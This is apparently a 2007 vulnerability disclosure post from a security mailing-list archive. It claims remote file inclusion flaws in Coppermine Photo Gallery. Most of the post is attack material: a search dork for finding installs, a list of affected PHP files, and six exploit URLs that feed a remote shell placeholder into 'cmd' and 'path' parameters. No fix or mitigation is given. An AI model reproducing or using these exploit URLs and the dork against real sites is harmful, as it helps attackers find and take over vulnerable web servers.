Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Lazarus Guestbook (admin.php)Remote File Include Expliot dynaliens v2.0/v2.1 bypass admin authentification + XSS xss in phpmyadmin >=2.8.0 and < 2.10.0 Word Press Sensitive Directory exposure (SQL) From:RaeD Hasadya <raed_(at)_bsdmail.com> Date:09.03.2007Subject:Remote File Include In Script Coppermine Photo GalleryBy Hasadya Raed Contact : RaeD@BsdMail.Com ------------------------------------ Script : Coppermine Photo Gallery Expl : Remote Include File Dork : "Copyright (c) 2003-2006 Coppermine Dev Team" ------------------------------------ B.Files : image_processor.php functions.php picmgmt.inc.php plugin_api.inc.php index.php Exploits : http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack] http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack] http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack] http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack] http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack] http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack] ---------------------------------------- By Hasadya Raed -- _______________________________________________ Get your free email from http://bsdmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Lazarus Guestbook (admin.php)Remote File Include Expliot
dynaliens v2.0/v2.1 bypass admin authentification + XSS
xss in phpmyadmin >=2.8.0 and < 2.10.0
Word Press Sensitive Directory exposure (SQL)
